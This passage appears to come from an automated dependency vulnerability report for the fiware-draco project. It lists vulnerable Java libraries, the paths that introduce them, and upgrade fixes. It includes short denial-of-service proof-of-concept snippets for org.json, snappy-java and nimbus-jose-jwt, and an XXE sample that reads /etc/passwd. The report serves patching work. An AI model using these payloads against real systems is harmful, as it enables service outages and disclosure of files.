  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-deploy@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.

Overview

org.eclipse.jetty:jetty-http is an is a http module for jetty server.

Affected versions of this package are vulnerable to Denial of Service (DoS) in the MetaDataBuilder.checkSize function. An attacker provide a very large or negative length value for the HTTP/2 HPACK header values. This can lead to an integer overflow, resulting in a very large buffer allocation on the server.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.eclipse.jetty:jetty-http to version 9.4.53.v20231009, 10.0.16, 11.0.16 or higher.

References

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.json:json
  • Introduced through: org.json:json@20211205

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.json:json@20211205
    Remediation: Upgrade to org.json:json@20231013.

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling. An attacker can cause indefinite amounts of memory to be used by inputting a string of modest size. This can lead to a Denial of Service.

PoC

package orgjsonbug;

import org.json.JSONObject;

/**
 * Illustrates a bug in JSON-Java.
 */
public class Bug {
  private static String makeNested(int depth) {
    if (depth == 0) {
      return "{\"a\":1}";
    }
    return "{\"a\":1;\t\0" + makeNested(depth - 1) + ":1}";
  }

  public static void main(String[] args) {
    String input = makeNested(30);
    System.out.printf("Input string has length %d: %s\n", input.length(), input);
    JSONObject output = new JSONObject(input);
    System.out.printf("Output JSONObject has length %d: %s\n", output.toString().length(), output);
  }
}

Remediation

Upgrade org.json:json to version 20231013 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: org.json:json
  • Introduced through: org.json:json@20211205

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.json:json@20211205
    Remediation: Upgrade to org.json:json@20230227.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) in the XML.toJSONObject component via crafted JSON or XML data.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.json:json to version 20230227 or higher.

References

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.xerial.snappy:snappy-java
  • Introduced through: org.apache.avro:avro@1.8.1, org.apache.nifi:nifi-avro-record-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
    Remediation: Upgrade to org.apache.avro:avro@1.9.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.xerial.snappy:snappy-java@1.1.1.3
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to a missing upper bound check on chunk length in the SnappyInputStream function. An attacker can decompress data with an excessively large chunk size.

Remediation

Upgrade org.xerial.snappy:snappy-java to version 1.1.10.4 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: org.xerial.snappy:snappy-java
  • Introduced through: org.apache.avro:avro@1.8.1, org.apache.nifi:nifi-avro-record-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
    Remediation: Upgrade to org.apache.avro:avro@1.9.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.xerial.snappy:snappy-java@1.1.1.3
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) via the hasNextChunk function due to improper validation of the chunkSize variable value.

Exploiting this vulnerability is possible by passing a negative number (such as 0xFFFFFFFF, which is -1), which will cause the code to raise a java.lang.NegativeArraySizeException exception. A worse case would happen when passing a huge positive value (such as 0x7FFFFFFF), raising the fatal java.lang.OutOfMemoryError error.

PoC

package org.example;
import org.xerial.snappy.SnappyInputStream;

import java.io.*;

public class Main {

    public static void main(String[] args) throws IOException {
        byte[] data = {-126, 'S', 'N', 'A', 'P', 'P', 'Y', 0, 0, 0, 0, 0, 0, 0, 0, 0,(byte) 0x7f, (byte) 0xff, (byte) 0xff, (byte) 0xff};
        SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data));
        byte[] out = new byte[50];
        try {
            in.read(out);
        }
        catch (Exception ignored) {

        }
    }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.xerial.snappy:snappy-java to version 1.1.10.1 or higher.

References

high severity

XML External Entity (XXE) Injection

  • Vulnerable module: org.apache.hadoop:hadoop-hdfs-client
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.

Overview

org.apache.hadoop:hadoop-hdfs-client is an Apache Hadoop HDFS Client.

Affected versions of this package are vulnerable to XML External Entity (XXE) Injection due to the weakly configured javax.xml.parsers.DocumentBuilder XML parser.

Details

XXE Injection is a type of attack against an application that parses XML input. XML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.

Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.

For example, below is a sample XML document, containing an XML element- username.

<xml>
<?xml version="1.0" encoding="ISO-8859-1"?>
   <username>John</username>
</xml>

An external XML entity - xxe, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of /etc/passwd and display it to the user rendered by username.

<xml>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
   <username>&xxe;</username>
</xml>

Other XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.

Remediation

Upgrade org.apache.hadoop:hadoop-hdfs-client to version 3.3.5 or higher.

References

high severity

XML External Entity (XXE) Injection

  • Vulnerable module: org.apache.nifi:nifi-security-kms
  • Introduced through: org.apache.nifi:nifi-security-utils@1.15.3 and org.apache.nifi:nifi-socket-utils@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.apache.nifi:nifi-security-kms@1.15.3
    Remediation: Upgrade to org.apache.nifi:nifi-security-utils@1.16.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.apache.nifi:nifi-security-kms@1.15.3
    Remediation: Upgrade to org.apache.nifi:nifi-socket-utils@1.16.1.

Overview

Affected versions of this package are vulnerable to XML External Entity (XXE) Injection where multiple components do not restrict XML External Entity references in the default configuration.

Details

XXE Injection is a type of attack against an application that parses XML input. XML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.

Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.

For example, below is a sample XML document, containing an XML element- username.

<xml>
<?xml version="1.0" encoding="ISO-8859-1"?>
   <username>John</username>
</xml>

An external XML entity - xxe, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of /etc/passwd and display it to the user rendered by username.

<xml>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
   <username>&xxe;</username>
</xml>

Other XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.

Remediation

Upgrade org.apache.nifi:nifi-security-kms to version 1.16.1 or higher.

References

high severity

Acceptance of Extraneous Untrusted Data With Trusted Data

  • Vulnerable module: dnsjava:dnsjava
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 dnsjava:dnsjava@2.1.7
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.

Overview

Affected versions of this package are vulnerable to Acceptance of Extraneous Untrusted Data With Trusted Data due to missing authentication in DNS responses. An attacker can manipulate DNS records and redirect network traffic or intercept sensitive information by injecting or altering DNS records from different zones in the communication channel.

Note:

This is only exploitable if the application utilizing DNSSEC does not implement additional checks on the relevance of DNS records to the original query.

Workaround

Users that are not able to upgrade to the fixed version can mitigate it by applying the following recommendations:

  1. When using a ValidatingResolver, ignore any Server indications of whether or not data was available (e.g. NXDOMAIN, NODATA);

  2. For APIs returning RRs from DNS responses, filter the RRs using an algorithm such as the one above. This includes e.g. LookupSession.lookupAsync;

  3. Remove APIs dealing with raw DNS messages from the examples section or place a noticeable warning above.

Remediation

Upgrade dnsjava:dnsjava to version 3.6.0 or higher.

References

medium severity

Uncontrolled Recursion

  • Vulnerable module: com.nimbusds:nimbus-jose-jwt
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.apache.hadoop:hadoop-auth@3.3.1 com.nimbusds:nimbus-jose-jwt@9.8.1
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.apache.hadoop:hadoop-auth@3.3.1 org.apache.kerby:kerb-simplekdc@1.0.1 org.apache.kerby:kerb-client@1.0.1 org.apache.kerby:token-provider@1.0.1 com.nimbusds:nimbus-jose-jwt@9.8.1
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.

Overview

com.nimbusds:nimbus-jose-jwt is a library for JSON Web Tokens (JWT)

Affected versions of this package are vulnerable to Uncontrolled Recursion due to the improper handling JWT claim sets containing deeply nested JSON objects. An attacker can cause application downtime or resource exhaustion by submitting a specially crafted JWT with excessive nesting.

Note:

This issue only affects nimbus-jose-jwt, not Gson because the Connect2id product could have checked the JSON object nesting depth, regardless of what limits (if any) were imposed by Gson.

PoC

import com.nimbusds.jwt.JWTClaimsSet;
import java.text.ParseException;
import java.util.HashMap;
import java.util.Map;

public class Test {
    // This builds a claimset with a deeply nested map, which could theoretically be supplied by a client.
    // If the JWT is serialized into JSON (for example, in logging or debugging), it can cause a StackOverflowError.
    public static void main(String[] args) throws ParseException {        
        Map<String, Object> nestedMap = new HashMap<>();
        Map<String, Object> currentLevel = nestedMap;

        for (int i = 0; i < 5000; i++) {
            Map<String, Object> nextLevel = new HashMap<>();
            currentLevel.put("", nextLevel);
            currentLevel = nextLevel;
        }

        JWTClaimsSet claimSet = JWTClaimsSet.parse(nestedMap);

        // This will cause a StackOverflowError due to excessive recursion in GSON's serialization
        claimSet.toString();
    }
}

Remediation

Upgrade com.nimbusds:nimbus-jose-jwt to version 9.37.4, 10.0.2 or higher.

References

medium severity

Uncontrolled Resource Consumption ('Resource Exhaustion')

  • Vulnerable module: commons-io:commons-io
  • Introduced through: org.apache.nifi:nifi-avro-record-utils@1.15.3, org.apache.nifi:nifi-processor-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-avro-record-utils@1.15.3 commons-io:commons-io@2.10.0
    Remediation: Upgrade to org.apache.nifi:nifi-avro-record-utils@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 commons-io:commons-io@2.10.0
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 commons-io:commons-io@2.10.0
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 commons-io:commons-io@2.10.0
    Remediation: Upgrade to org.apache.nifi:nifi-socket-utils@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 commons-io:commons-io@2.10.0
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 commons-io:commons-io@2.10.0
    Remediation: Upgrade to org.apache.nifi:nifi-database-utils@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 commons-io:commons-io@2.10.0
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.apache.hadoop:hadoop-auth@3.3.1 org.apache.kerby:kerb-simplekdc@1.0.1 org.apache.kerby:kerb-client@1.0.1 org.apache.kerby:kerb-common@1.0.1 commons-io:commons-io@2.10.0
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.apache.hadoop:hadoop-auth@3.3.1 org.apache.kerby:kerb-simplekdc@1.0.1 org.apache.kerby:kerb-admin@1.0.1 org.apache.kerby:kerb-server@1.0.1 org.apache.kerby:kerb-common@1.0.1 commons-io:commons-io@2.10.0
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.

Overview

commons-io:commons-io is a The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.

Affected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') through the XmlStreamReader class. An attacker can cause the application to consume excessive CPU resources by sending specially crafted XML content.

Remediation

Upgrade commons-io:commons-io to version 2.14.0 or higher.

References

medium severity

Improper Resource Shutdown or Release

  • Vulnerable module: org.eclipse.jetty:jetty-server
  • Introduced through: org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-server@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-deploy@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927

Overview

org.eclipse.jetty:jetty-server is a lightweight highly scalable java based web server and servlet engine.

Affected versions of this package are vulnerable to Improper Resource Shutdown or Release due to an error in handling gzip compression in the GzipHandler. An attacker can corrupt data and inadvertently share it between requests by exploiting the improper release of a buffer when a gzip error occurs during the inflation of a request body.

Remediation

Upgrade org.eclipse.jetty:jetty-server to version 9.4.57.v20241219 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: org.eclipse.jetty:jetty-servlets
  • Introduced through: org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlets@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.

Overview

